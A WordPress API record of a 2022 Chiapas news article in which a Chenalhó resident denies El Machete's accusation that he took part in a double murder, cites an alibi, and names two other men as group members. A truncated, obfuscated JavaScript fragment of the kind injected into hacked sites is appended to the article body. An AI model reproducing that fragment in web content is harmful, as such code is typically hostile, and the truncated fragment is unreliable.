{"id":4454,"date":"2022-08-17T02:54:20","date_gmt":"2022-08-17T02:54:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4454"},"modified":"2022-08-17T02:54:21","modified_gmt":"2022-08-17T02:54:21","slug":"el-machete-expone-que-no-ha-lanzado-amenazas-a-los-motonetos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4454","title":{"rendered":"El Machete,  expone que no ha lanzado amenazas a los motonetos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-16-at-1.20.31-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-4455\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-16-at-1.20.31-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-16-at-1.20.31-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-16-at-1.20.31-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-16-at-1.20.31-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez <\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Ernesto G\u00f3mez, habitante de la Comunidad Xokil Uk&#8217;um, municipio de Chenalh\u00f3, desminti\u00f3 los se\u00f1alamientos hechos por miembros del grupo de autodensa El Machete, municipio de Pantelh\u00f3, quienes lo se\u00f1alan del asesinato de dos personas el pasado 5 de agosto sobre el perioferico Norte, a la altura de la Colonia Nueva Esperanza. \u201cPrimeramente decirles que no pertenezco a ning\u00fan grupo criminal y a la vez estoy preocupado por mi seguridad y la de mi familia, y aclarar que no tengo ning\u00fan altercado con Los machetes, ya que ellos son de otro municipio y nuestro municipio no tiene ning\u00fan problema con el municipio de Pantelh\u00f3, sin embargo quiero hacer menci\u00f3n de Reynaldo Ru\u00edz Hern\u00e1ndez originario de la comunidad de Pechiquil y Fernando Ru\u00edz Hern\u00e1ndez de Fracci\u00f3n Polh\u00f3, ambos del municipio de Chenalh\u00f3, ellos son integrantes del grupo Los Maches\u201d, dijo en conferencia de prensa. Al dirigirse a los medios de comunicaci\u00f3n y la ciudadan\u00eda Chiapaneca, desminti\u00f3 el comunicado que emitieran Los Machetes el 13 de agosto de este a\u00f1o \u201cdonde hacen menci\u00f3n de mi nombre y nos culpan del asesinato de Javier Ru\u00edz N. y Jos\u00e9 Ru\u00edz N. ocurrido en San Crist\u00f3bal el 05 de agosto de este a\u00f1o en el perif\u00e9rico norte oriente de esta ciudad\u201d. Dej\u00f3 en claro que el d\u00eda de los hechos, \u201cdel asesinato de Javier Ru\u00edz N. y Jos\u00e9 Ru\u00edz N.\u201d, no se encontraba en San Crist\u00f3bal, \u201cya que me encontraba en otro Pa\u00eds, trabajando en la Ciudad Stockton California. Tengo mis talones de cheque del d\u00eda 04 y 11 de agosto para acreditar mi estancia en ese pa\u00eds, y mi boleto de vuelo el d\u00eda 13 de agosto en Aero M\u00e9xico\u201d. \u201cInformarle a Los Machetes que es infundado las acusaciones que ha hecho a mi familia y en mi persona, los \u00fanicos que nos conocen en nuestro Municipio son: Reynaldo Ru\u00edz Hern\u00e1ndez y Fernando Ru\u00edz Hern\u00e1ndez a ellos los hacemos responsables de nuestra familia y de mi persona\u201d, apunt\u00f3. Solicit\u00f3 a las autoridades correspondiente, den con los responsables del asesinato de estas personas y que Los Machetes, no difundan acusaciones sin sustento ni fundamento, \u201cya que no tengo ning\u00fan inter\u00e9s en el Municipio de Pantelh\u00f3\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Ernesto G\u00f3mez, habitante de la Comunidad Xokil Uk&#8217;um, municipio de Chenalh\u00f3, desminti\u00f3 los se\u00f1alamientos hechos por miembros del grupo de autodensa El Machete, municipio de Pantelh\u00f3, quienes lo se\u00f1alan del asesinato de dos personas el pasado 5 de agosto sobre el perioferico Norte, a la altura de la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4455,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4454","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4454"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4454\/revisions"}],"predecessor-version":[{"id":4456,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4454\/revisions\/4456"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4455"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4454"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}